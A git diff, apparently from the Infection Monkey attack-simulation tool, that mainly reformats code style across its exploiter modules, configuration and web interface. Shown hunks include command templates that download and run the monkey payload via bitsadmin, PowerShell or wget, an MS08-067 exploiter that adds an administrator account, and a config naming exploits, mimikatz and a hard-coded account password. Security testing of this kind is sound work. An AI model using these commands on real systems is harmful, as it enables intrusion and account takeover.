.../cc/resources/pba_file_upload.py | 1 + .../cc/resources/reporting/report.py | 9 +- .../cc/resources/representations_test.py | 12 +- .../cc/resources/telemetry_feed.py | 4 +- .../cc/resources/test/log_test.py | 1 - monkey/monkey_island/cc/server_config.json | 4 +- .../cc/services/attack/attack_report.py | 3 +- .../attack/technique_reports/T1003.py | 1 - .../attack/technique_reports/T1005.py | 1 - .../attack/technique_reports/T1016.py | 1 - .../attack/technique_reports/T1018.py | 1 - .../attack/technique_reports/T1021.py | 1 - .../attack/technique_reports/T1041.py | 1 - .../attack/technique_reports/T1059.py | 1 - .../attack/technique_reports/T1065.py | 1 - .../attack/technique_reports/T1075.py | 1 - .../attack/technique_reports/T1082.py | 23 +- .../attack/technique_reports/T1086.py | 1 - .../attack/technique_reports/T1090.py | 3 - .../attack/technique_reports/T1105.py | 1 - .../attack/technique_reports/T1110.py | 2 - .../attack/technique_reports/T1188.py | 1 - .../attack/technique_reports/T1210.py | 5 +- monkey/monkey_island/cc/services/config.py | 5 +- monkey/monkey_island/cc/services/database.py | 2 - .../monkey_island/cc/services/island_logs.py | 1 + .../cc/services/mimikatz_utils.py | 1 - .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 32 +-- .../cc/services/reporting/exporter_init.py | 1 + .../cc/services/reporting/test_pth_report.py | 3 - .../reporting/test_zero_trust_service.py | 2 +- .../telemetry/processing/post_breach.py | 1 - .../zero_trust_tests/segmentation.py | 8 +- .../cc/services/version_update.py | 1 - .../monkey_island/cc/services/wmi_handler.py | 2 - monkey/monkey_island/cc/ui/.babelrc | 10 +- monkey/monkey_island/cc/ui/.eslintrc | 12 +- monkey/monkey_island/cc/ui/karma.conf.js | 14 +- monkey/monkey_island/cc/ui/server.js | 14 +- .../src/components/attack/MatrixComponent.js | 64 ++--- .../components/attack/techniques/Helpers.js | 81 +++--- .../src/components/attack/techniques/T1003.js | 3 +- .../src/components/attack/techniques/T1005.js | 23 +- .../src/components/attack/techniques/T1016.js | 24 +- .../src/components/attack/techniques/T1018.js | 37 ++- .../src/components/attack/techniques/T1021.js | 22 +- .../src/components/attack/techniques/T1035.js | 10 +- .../src/components/attack/techniques/T1041.js | 16 +- .../src/components/attack/techniques/T1059.js | 27 +- .../src/components/attack/techniques/T1064.js | 10 +- .../src/components/attack/techniques/T1075.js | 29 +- .../src/components/attack/techniques/T1082.js | 24 +- .../src/components/attack/techniques/T1086.js | 27 +- .../src/components/attack/techniques/T1090.js | 17 +- .../src/components/attack/techniques/T1105.js | 21 +- .../src/components/attack/techniques/T1106.js | 10 +- .../src/components/attack/techniques/T1107.js | 32 ++- .../src/components/attack/techniques/T1110.js | 28 +- .../src/components/attack/techniques/T1129.js | 8 +- .../src/components/attack/techniques/T1145.js | 35 +-- .../src/components/attack/techniques/T1188.js | 33 ++- .../src/components/attack/techniques/T1197.js | 48 ++-- .../src/components/attack/techniques/T1210.js | 74 ++--- .../src/components/attack/techniques/T1222.js | 19 +- .../map/preview-pane/InfMapPreviewPane.js | 16 +- .../map/preview-pane/PreviewPane.js | 16 +- .../ui/src/components/pages/ConfigurePage.js | 254 ++++++++++-------- .../cc/ui/src/components/pages/LicensePage.js | 4 +- .../cc/ui/src/components/pages/MapPage.js | 25 +- .../components/pages/PassTheHashMapPage.js | 8 +- .../cc/ui/src/components/pages/ReportPage.js | 187 +++++++------ .../ui/src/components/pages/RunMonkeyPage.js | 49 ++-- .../ui/src/components/pages/StartOverPage.js | 15 +- .../ui/src/components/pages/TelemetryPage.js | 66 ++--- .../common/PaginatedTable.js | 3 +- .../security/AttackReport.js | 55 ++-- .../security/BreachedServers.js | 10 +- .../report-components/security/PostBreach.js | 30 +-- .../security/ScannedServers.js | 14 +- .../security/StolenPasswords.js | 6 +- .../report-components/security/StrongUsers.js | 8 +- .../zerotrust/EventsButton.js | 14 +- .../zerotrust/EventsModal.js | 6 +- .../zerotrust/EventsTimeline.js | 4 +- .../zerotrust/PillarLabel.js | 3 +- .../zerotrust/PrinciplesStatusTable.js | 13 +- .../zerotrust/ReportLegend.js | 8 +- .../zerotrust/SinglePillarPrinciplesStatus.js | 6 +- .../zerotrust/StatusesToPillarsSummary.js | 10 +- .../zerotrust/SummarySection.js | 7 +- .../src/components/run-monkey/AwsRunTable.js | 12 +- .../src/components/ui-components/Checkbox.js | 99 +++---- monkey/monkey_island/cc/ui/src/config/base.js | 3 +- .../cc/ui/src/images/infection-monkey.svg | 47 ++-- .../cc/ui/src/images/monkey-icon.svg | 11 +- .../zerotrust/im-alert-machine-icon.svg | 14 +- .../zerotrust/im-alert-network-icon.svg | 24 +- monkey/monkey_island/cc/ui/src/index.html | 2 +- monkey/monkey_island/cc/ui/src/index.js | 2 +- .../cc/ui/src/server_config/AwsConfig.js | 2 +- .../cc/ui/src/server_config/PasswordConfig.js | 2 +- .../cc/ui/src/server_config/StandardConfig.js | 2 +- .../cc/ui/src/services/AuthService.js | 5 +- monkey/monkey_island/cc/ui/src/styles/App.css | 37 +-- .../cc/ui/src/styles/Checkbox.scss | 137 +++++----- .../cc/ui/src/styles/Collapse.scss | 13 +- monkey/monkey_island/cc/utils.py | 2 +- 147 files changed, 1370 insertions(+), 1150 deletions(-) diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 0fc6dd10a..55a359b60 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -114,7 +114,7 @@ class MonkeyDrops(object): except OSError: LOG.warning("Cannot set reference date to destination file") - monkey_options =\ + monkey_options = \ build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) if OperatingSystem.Windows == SystemInfoCollector.get_os(): diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index 194e18625..4fb0200c8 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -1,109 +1,109 @@ { - "should_exploit": true, - "command_servers": [ - "192.0.2.0:5000" - ], - "internet_services": [ - "monkey.guardicore.com", - "www.google.com" - ], - "keep_tunnel_open_time": 60, - "subnet_scan_list": [ + "should_exploit": true, + "command_servers": [ + "192.0.2.0:5000" + ], + "internet_services": [ + "monkey.guardicore.com", + "www.google.com" + ], + "keep_tunnel_open_time": 60, + "subnet_scan_list": [ - ], - "inaccessible_subnets": [], - "blocked_ips": [], - "current_server": "192.0.2.0:5000", - "alive": true, - "collect_system_info": true, - "extract_azure_creds": true, - "should_use_mimikatz": true, - "depth": 2, + ], + "inaccessible_subnets": [], + "blocked_ips": [], + "current_server": "192.0.2.0:5000", + "alive": true, + "collect_system_info": true, + "extract_azure_creds": true, + "should_use_mimikatz": true, + "depth": 2, - "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", - "dropper_date_reference_path_linux": "/bin/sh", - "dropper_log_path_windows": "%temp%\\~df1562.tmp", - "dropper_log_path_linux": "/tmp/user-1562", - "dropper_set_date": true, - "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", - "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", - "dropper_target_path_linux": "/tmp/monkey", + "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", + "dropper_date_reference_path_linux": "/bin/sh", + "dropper_log_path_windows": "%temp%\\~df1562.tmp", + "dropper_log_path_linux": "/tmp/user-1562", + "dropper_set_date": true, + "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", + "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", + "dropper_target_path_linux": "/tmp/monkey", - "monkey_dir_name": "monkey_dir", + "monkey_dir_name": "monkey_dir", - "kill_file_path_linux": "/var/run/monkey.not", - "kill_file_path_windows": "%windir%\\monkey.not", - "dropper_try_move_first": true, - "exploiter_classes": [ - "SSHExploiter", - "SmbExploiter", - "WmiExploiter", - "ShellShockExploiter", - "ElasticGroovyExploiter", - "SambaCryExploiter", - "Struts2Exploiter", - "WebLogicExploiter", - "HadoopExploiter", - "VSFTPDExploiter", - "MSSQLExploiter" - ], - "finger_classes": [ - "SSHFinger", - "PingScanner", - "HTTPFinger", - "SMBFinger", - "MySQLFinger", - "MSSQLFingerprint", - "ElasticFinger" - ], - "max_iterations": 3, - "monkey_log_path_windows": "%temp%\\~df1563.tmp", - "monkey_log_path_linux": "/tmp/user-1563", - "send_log_to_server": true, - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT", - "remote_user_pass": "Password1!", - "ping_scan_timeout": 10000, - "smb_download_timeout": 300, - "smb_service_name": "InfectionMonkey", - "retry_failed_explotation": true, - "self_delete_in_cleanup": true, - "serialize_config": false, - "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", - "skip_exploit_if_file_exist": false, - "exploit_user_list": [], - "exploit_password_list": [], - "exploit_lm_hash_list": [], - "exploit_ntlm_hash_list": [], - "exploit_ssh_keys": [], - "sambacry_trigger_timeout": 5, - "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], - "sambacry_shares_not_to_check": ["IPC$", "print$"], - "local_network_scan": false, - "tcp_scan_get_banner": true, - "tcp_scan_interval": 0, - "tcp_scan_timeout": 10000, - "tcp_target_ports": [ - 22, - 445, - 135, - 3389, - 80, - 8080, - 443, - 3306, - 8008, - 9200, - 7001, - 8088 - ], - "timeout_between_iterations": 10, - "use_file_logging": true, - "victims_max_exploit": 15, - "victims_max_find": 100, - "post_breach_actions" : [] - custom_PBA_linux_cmd = "" - custom_PBA_windows_cmd = "" - PBA_linux_filename = None - PBA_windows_filename = None + "kill_file_path_linux": "/var/run/monkey.not", + "kill_file_path_windows": "%windir%\\monkey.not", + "dropper_try_move_first": true, + "exploiter_classes": [ + "SSHExploiter", + "SmbExploiter", + "WmiExploiter", + "ShellShockExploiter", + "ElasticGroovyExploiter", + "SambaCryExploiter", + "Struts2Exploiter", + "WebLogicExploiter", + "HadoopExploiter", + "VSFTPDExploiter", + "MSSQLExploiter" + ], + "finger_classes": [ + "SSHFinger", + "PingScanner", + "HTTPFinger", + "SMBFinger", + "MySQLFinger", + "MSSQLFingerprint", + "ElasticFinger" + ], + "max_iterations": 3, + "monkey_log_path_windows": "%temp%\\~df1563.tmp", + "monkey_log_path_linux": "/tmp/user-1563", + "send_log_to_server": true, + "ms08_067_exploit_attempts": 5, + "user_to_add": "Monkey_IUSER_SUPPORT", + "remote_user_pass": "Password1!", + "ping_scan_timeout": 10000, + "smb_download_timeout": 300, + "smb_service_name": "InfectionMonkey", + "retry_failed_explotation": true, + "self_delete_in_cleanup": true, + "serialize_config": false, + "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", + "skip_exploit_if_file_exist": false, + "exploit_user_list": [], + "exploit_password_list": [], + "exploit_lm_hash_list": [], + "exploit_ntlm_hash_list": [], + "exploit_ssh_keys": [], + "sambacry_trigger_timeout": 5, + "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], + "sambacry_shares_not_to_check": ["IPC$", "print$"], + "local_network_scan": false, + "tcp_scan_get_banner": true, + "tcp_scan_interval": 0, + "tcp_scan_timeout": 10000, + "tcp_target_ports": [ + 22, + 445, + 135, + 3389, + 80, + 8080, + 443, + 3306, + 8008, + 9200, + 7001, + 8088 + ], + "timeout_between_iterations": 10, + "use_file_logging": true, + "victims_max_exploit": 15, + "victims_max_find": 100, + "post_breach_actions": [] + custom_PBA_linux_cmd = "" + custom_PBA_windows_cmd = "" + PBA_linux_filename = None + PBA_windows_filename = None } diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index c8f897dd2..f66a58ab0 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\ +from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \ DOWNLOAD_TIMEOUT from infection_monkey.network.elasticfinger import ES_PORT from common.data.network_consts import ES_SERVICE @@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE): # Overridden web_rce method that adds CMD prefix for windows command try: if 'windows' in self.host.os['type']: - resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND) + resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) else: resp = self.exploit(url, CHECK_COMMAND) if resp is True: diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..c8982a7e2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -17,7 +17,6 @@ LOG = logging.getLogger(__name__) class MSSQLExploiter(HostExploiter): - _EXPLOITED_SERVICE = 'MSSQL' _TARGET_OS_TYPE = ['windows'] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE @@ -143,7 +142,7 @@ class MSSQLExploiter(HostExploiter): def get_monkey_download_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\ + monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \ format(http_path=self.monkey_server.http_path, dst_path=dst_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) @@ -192,5 +191,5 @@ class MSSQLLimitedSizePayload(LimitedSizePayload): def __init__(self, command, prefix="", suffix=""): super(MSSQLLimitedSizePayload, self).__init__(command=command, max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, - prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix, - suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END) + prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, + suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END) diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index edc4851e9..932d94b77 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -132,7 +132,7 @@ class ShellShockExploiter(HostExploiter): self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( - 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue diff --git a/monkey/infection_monkey/exploit/tools/exceptions.py b/monkey/infection_monkey/exploit/tools/exceptions.py index eabe8d9d7..d37ab9e53 100644 --- a/monkey/infection_monkey/exploit/tools/exceptions.py +++ b/monkey/infection_monkey/exploit/tools/exceptions.py @@ -1,5 +1,3 @@ - - class ExploitingVulnerableMachineError(Exception): """ Raise when exploiter failed, but machine is vulnerable""" pass diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 91a25c270..5e4b43b20 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -74,7 +74,7 @@ def get_target_monkey(host): if host.os.get('type') == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): + host.os.get('machine', '').lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py b/monkey/infection_monkey/exploit/tools/payload_parsing.py index 31632b045..5c4415fe3 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py @@ -49,7 +49,7 @@ class LimitedSizePayload(Payload): "exceeds required length of command.") elif self.command == "": - return [self.prefix+self.suffix] + return [self.prefix + self.suffix] wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length()) commands = [self.get_payload(part) for part diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 51564518e..2507cff66 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -12,6 +12,7 @@ from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.config import Configuration + __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac648012b..daccb4cfb 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -1,4 +1,3 @@ - import threading import logging import time @@ -13,7 +12,6 @@ from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.network.info import get_free_tcp_port from http.server import BaseHTTPRequestHandler, HTTPServer - __author__ = "VakarisZ" LOG = logging.getLogger(__name__) @@ -34,7 +32,6 @@ HEADERS = { class WebLogicExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Weblogic' diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 7148ba965..4257677b0 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -162,11 +162,11 @@ class Ms08_067_Exploiter(HostExploiter): def is_os_supported(self): if self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()): + self.host.os.get('version') in list(self._windows_versions.keys()): return True if not self.host.os.get('type') or ( - self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): + self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() @@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter): sock.send("cmd /c (net user {} {} /add) &&" " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add).encode()) + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add).encode()) time.sleep(2) reply = sock.recv(1000) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 257cfd469..cc286bfcd 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -122,4 +122,3 @@ class WmiExploiter(HostExploiter): return success return False - diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 254bce966..e4cfea7a4 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -5,14 +5,14 @@ __author__ = 'itamar' MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" ID_STRING = "M0NK3Y3XPL0ITABLE" -DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) +MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' -DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ - '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) + '/c %%(monkey_path)s %s"' % (MONKEY_ARG,) DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ 'file_path)s exit)) > NUL 2>&1 ' @@ -33,12 +33,12 @@ GET_ARCH_LINUX = "lscpu" # All in one commands (upload, change permissions, run) HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \ - "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ - " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ - "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" + "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ + " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ + "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \ - "&& wget -O %(monkey_path)s %(http_path)s " \ - "; chmod +x %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" + "&& wget -O %(monkey_path)s %(http_path)s " \ + "; chmod +x %(monkey_path)s " \ + "&& %(monkey_path)s %(monkey_type)s %(parameters)s" DOWNLOAD_TIMEOUT = 180 diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..a74c497af 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -182,7 +182,7 @@ class InfectionMonkey(object): if self._default_server: if self._network.on_island(self._default_server): machine.set_default_server(get_interface_to_target(machine.ip_addr) + - (':'+self._default_server_port if self._default_server_port else '')) + (':' + self._default_server_port if self._default_server_port else '')) else: machine.set_default_server(self._default_server) LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server)) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 2d7b981f5..1418c22cc 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -13,7 +13,6 @@ from requests import ConnectionError from common.network.network_range import CidrRange from infection_monkey.utils.environment import is_windows_os - # Timeout for monkey connections TIMEOUT = 15 LOOPBACK_NAME = b"lo" diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index e6130732d..623b7368f 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -12,7 +12,6 @@ LOG = logging.getLogger(__name__) class MSSQLFinger(HostFinger): - # Class related consts SQL_BROWSER_DEFAULT_PORT = 1434 BUFFER_SIZE = 4096 diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index fa2d812ae..3df936672 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py @@ -11,7 +11,6 @@ BANNER_READ = 1024 class TcpScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = 'unknown(TCP)' def __init__(self): diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 89417757d..3438eccda 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -27,6 +27,7 @@ class UsersPBA(PBA): """ Defines user's configured post breach action. """ + def __init__(self): super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION) self.filename = '' diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 73b8a3221..57bf0aaf7 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py @@ -7,7 +7,6 @@ from infection_monkey.utils.environment import is_windows_os from infection_monkey.config import WormConfiguration from infection_monkey.telemetry.attack.t1064_telem import T1064Telem - LOG = logging.getLogger(__name__) __author__ = 'VakarisZ' @@ -19,6 +18,7 @@ class PBA(object): """ Post breach action object. Can be extended to support more than command execution on target machine. """ + def __init__(self, name="unknown", linux_cmd="", windows_cmd=""): """ :param name: Name of post breach action. diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index b5dfa93c7..78ee4ad42 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -16,6 +16,7 @@ class PostBreach(object): """ This class handles post breach actions execution """ + def __init__(self): self.os_is_linux = not is_windows_os() self.pba_list = self.config_to_pba_list() diff --git a/monkey/infection_monkey/pyinstaller_utils.py b/monkey/infection_monkey/pyinstaller_utils.py index d169bda6a..3e2bed17e 100644 --- a/monkey/infection_monkey/pyinstaller_utils.py +++ b/monkey/infection_monkey/pyinstaller_utils.py @@ -1,7 +1,6 @@ import os import sys - __author__ = 'itay.mizeretz' diff --git a/monkey/infection_monkey/system_info/linux_info_collector.py b/monkey/infection_monkey/system_info/linux_info_collector.py index 831b10ba1..fb38f84c4 100644 --- a/monkey/infection_monkey/system_info/linux_info_collector.py +++ b/monkey/infection_monkey/system_info/linux_info_collector.py @@ -26,4 +26,3 @@ class LinuxInfoCollector(InfoCollector): super(LinuxInfoCollector, self).get_info() self.info['ssh_info'] = SSHCollector.get_info() return self.info - diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 2c3696f44..1419478db 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -1,6 +1,7 @@ import os import logging import sys + sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py index a87e297d9..a42472b82 100644 --- a/monkey/infection_monkey/system_info/wmi_consts.py +++ b/monkey/infection_monkey/system_info/wmi_consts.py @@ -29,4 +29,3 @@ WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", "DS_whenChanged", "DS_whenCreated"), } - diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index 485a9253e..f82e7be44 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,6 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration - __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/transport/__init__.py b/monkey/infection_monkey/transport/__init__.py index 735ef670a..25509ef85 100644 --- a/monkey/infection_monkey/transport/__init__.py +++ b/monkey/infection_monkey/transport/__init__.py @@ -1,4 +1,3 @@ from infection_monkey.transport.http import HTTPServer, LockedHTTPServer - __author__ = 'hoffer' diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py index e910e657f..22cff5d4a 100644 --- a/monkey/infection_monkey/transport/tcp.py +++ b/monkey/infection_monkey/transport/tcp.py @@ -41,13 +41,13 @@ class SocketsPipe(Thread): except: break self._keep_connection = True - + self.source.close() self.dest.close() class TcpProxy(TransportProxyBase): - + def run(self): pipes = [] l_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 8ab61c895..9b5e7b849 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -39,7 +39,6 @@ from monkey_island.cc.resources.test.log_test import LogTest __author__ = 'Barak' - HOME_FILE = 'index.html' diff --git a/monkey/monkey_island/cc/island_logger.py b/monkey/monkey_island/cc/island_logger.py index 8fbef1e0e..f55fcf896 100644 --- a/monkey/monkey_island/cc/island_logger.py +++ b/monkey/monkey_island/cc/island_logger.py @@ -2,7 +2,6 @@ import os import json import logging.config - __author__ = 'Maor.Rayzin' diff --git a/monkey/monkey_island/cc/island_logger_default_config.json b/monkey/monkey_island/cc/island_logger_default_config.json index 34a57b374..522177cda 100644 --- a/monkey/monkey_island/cc/island_logger_default_config.json +++ b/monkey/monkey_island/cc/island_logger_default_config.json @@ -1,33 +1,33 @@ { - "version": 1, - "disable_existing_loggers": false, - "formatters": { - "simple": { - "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" - } - }, - - "handlers": { - "console": { - "class": "logging.StreamHandler", - "level": 